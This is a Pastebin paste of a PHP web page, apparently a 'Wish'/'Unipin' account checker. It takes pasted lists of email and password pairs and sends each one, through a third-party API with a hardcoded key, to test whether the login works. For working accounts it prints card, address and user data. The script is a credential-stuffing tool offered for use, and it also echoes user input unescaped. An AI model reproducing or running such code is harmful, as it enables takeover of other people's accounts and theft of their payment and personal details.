fajarjr830

Script Wish Checker 2016

May 5th, 2016
1,892
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.49 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>Unipin Checker</title>
  12. <style>
  13. body {
  14. padding-top: 60px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <div class="container">
  20. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  21. <!-- Start .panel -->
  22. <div class="panel-heading">
  23. <h4 class="panel-title">Unipin account Checker</h4>
  24. </div>
  25. <div class="panel-body">
  26. <form action="" method="POST">
  27. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="[email protected]|passW0rd"><?php
  28. if (isset($_POST['mailpass'])) {
  29. echo $_POST['mailpass'];
  30. }
  31. ?></textarea><br />
  32. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  33. <input type="submit" class="btn btn-success" value="Submit" name="submit"><br><br>
  34. <?php
  35. if(isset($_POST['submit'])){
  36.  
  37.  
  38. $girudatsu_key = 'PGn0cpG6RZR97Oj63A0egha';
  39.  
  40. $email = '';
  41.  
  42. $password = '';
  43.  
  44. $output = 'json'; // choose the outpust between text or json. default text. (optional) // change this to choose the text output
  45.  
  46. $cetak = '';
  47.  
  48. $delim = $_POST['delim'];
  49.  
  50. function search($line, $delim)
  51. {
  52. $line = str_replace(" ", "", $line);
  53. $line = explode($delim, $line);
  54. $i = 0;
  55. while ($i < count($line)) {
  56. if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  57. $mail = $line[$i];
  58. $pass = $line[$i + 1];
  59. $i = 10000;
  60. if ($pass == "") {
  61. $pass = $line[$i - 1];
  62. }
  63. }
  64. $i++;
  65. }
  66. $line = $mail . "|" . $pass;
  67. $line = explode('|', $line);
  68. return $line;
  69. }
  70.  
  71.  
  72. $data = $_POST['mailpass'];
  73. $extract = explode("\r\n", $data);
  74. $i = 0;
  75.  
  76. foreach ($extract AS $k => $line)
  77. {
  78. $i++;
  79. if (strpos($line, '=>') !== false) {
  80. $line = str_replace('=>', '|', $line);
  81. }
  82. if (strpos($line, ']') !== false) {
  83. $line = str_replace('=>', '|', $line);
  84. }
  85. if (strpos($line, '[') !== false) {
  86. $line = str_replace('=>', '|', $line);
  87. }
  88.  
  89. $info = search(trim($line), $delim);
  90. $email = trim($info[0]);
  91. $pass = $info[1];
  92.  
  93.  
  94. $params = '&email=' . $email . '&password=' . $password . ((isset($output)) ? '&output=' . $output : "");
  95.  
  96. $result = json_decode(file_get_contents("http://girudatsu.website/api/wish?api=". $girudatsu_key . $params), true);
  97.  
  98.  
  99. if ($result['code'] == 0)// if 0 mean LIVE
  100. {
  101. $cetak .= 'LIVE | ' .
  102. $result['data']['email'] . ' | ' .
  103. $result['data']['password'] . ' | ' .
  104. $result['data']['userId'] . ' | ' .
  105. $result['data']['card'] . ' | ' .
  106. $result['data']['notifCount'] . ' | ' .
  107. $result['data']['cartCount'] . ' | ' .
  108. $result['data']['address'] . ' | ' .
  109. ' Bukhori <br />' ;
  110.  
  111.  
  112. }
  113. else
  114. {
  115. $cetak .= 'DIE | ' .
  116. $result['data']['email'] . ' | ' .
  117. $result['data']['password'] . ' | ' .
  118. ' Bukhori <br />' ;
  119. }
  120.  
  121. }
  122.  
  123.  
  124.  
  125.  
  126.  
  127. echo $cetak;
  128.  
  129. }
  130. ?>
Advertisement
Add Comment
Please, Sign In to add comment